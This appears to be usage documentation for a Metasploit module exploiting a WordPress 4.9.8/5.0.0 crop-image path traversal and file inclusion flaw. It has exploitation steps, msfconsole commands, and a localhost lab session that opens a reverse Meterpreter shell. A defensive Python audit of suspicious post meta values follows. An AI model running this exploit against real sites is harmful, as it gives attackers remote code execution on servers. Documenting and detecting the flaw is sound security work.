On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion. An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.

## Exploitation Steps

1. Upload an image containing PHP code.
2. Edit the `_wp_attached_file` entry from the `meta_input` `$_POST` array to specify an arbitrary path.
3. Perform the Path Traversal by using the `crop-image` WordPress function.
4. Perform the Local File Inclusion by creating a new WordPress post and setting the `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.

When visiting the post created by the attacker it is possible to obtain code execution.

More details can be found on the [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).

## Verification Steps

Confirm that the functionality works:

1. Start `msfconsole`
2. `use exploit/multi/http/wp_crop_rce`
3. Set the `RHOST`
4. Set `USERNAME` and `PASSWORD`
5. Set `LHOST` and `LPORT`
6. Run the exploit: `run`
7. Confirm that you now have a Meterpreter session

## Options

### THEME_DIR

The name of the theme WordPress is using. Used if the theme cannot be auto-detected.

## Scenarios

### Ubuntu 18.04 running WordPress 4.9.8

```
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux
```
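The exploitation chain above leaves its trace in two post meta keys, `_wp_attached_file` and `_wp_page_template`. As an added defensive example (not part of this module or the RIPS write-up), the audit below flags values of those keys that do not match their normal shape; the `wp_postmeta` rows are constructed sample data, and the baseline shapes (a relative upload path such as `2019/03/name.jpg`, and `default` or a theme-relative `.php` template) are assumptions about a stock WordPress install.

```python
import re

# Constructed sample rows in the shape of wp_postmeta (post_id, meta_key, meta_value).
# Rows 42 and 43 imitate the two tampered keys described above; the rest are benign.
SAMPLE_POSTMETA = [
    (41, "_wp_attached_file", "2019/03/photo.jpg"),
    (41, "_wp_page_template", "default"),
    (42, "_wp_attached_file", "2019/03/../../themes/example-theme/evil.jpg"),
    (43, "_wp_page_template", "cropped-evil.jpg"),
    (44, "_wp_page_template", "templates/full-width.php"),
    (45, "_wp_attached_file", "docs/report.pdf"),
]

# A stock attachment path: relative, plain path segments, no traversal or query string.
SAFE_RELATIVE_PATH_RE = re.compile(r"(?:[\w-]+/)*[\w.-]+")


def attached_file_suspicious(value: str) -> bool:
    """_wp_attached_file should be a plain path relative to wp-content/uploads."""
    if ".." in value or "?" in value or value.startswith("/"):
        return True
    return SAFE_RELATIVE_PATH_RE.fullmatch(value) is None


def page_template_suspicious(value: str) -> bool:
    """_wp_page_template should be 'default' or a theme-relative .php template."""
    if value == "default":
        return False
    if ".." in value or value.startswith("/"):
        return True
    return not value.lower().endswith(".php")


def audit_postmeta(rows):
    """Return (post_id, key, value, reason) for every row whose value is out of shape."""
    findings = []
    for post_id, key, value in rows:
        if key == "_wp_attached_file" and attached_file_suspicious(value):
            findings.append((post_id, key, value, "attached file path leaves the uploads layout"))
        elif key == "_wp_page_template" and page_template_suspicious(value):
            findings.append((post_id, key, value, "page template is not a theme .php file"))
    return findings


if __name__ == "__main__":
    for post_id, key, value, reason in audit_postmeta(SAMPLE_POSTMETA):
        print(f"post {post_id}: {key}={value!r} ({reason})")
```

Against a live site the same checks can be run over `SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE meta_key IN ('_wp_attached_file', '_wp_page_template')`; a hit is a reason to inspect the post and the referenced file, not proof of compromise on its own.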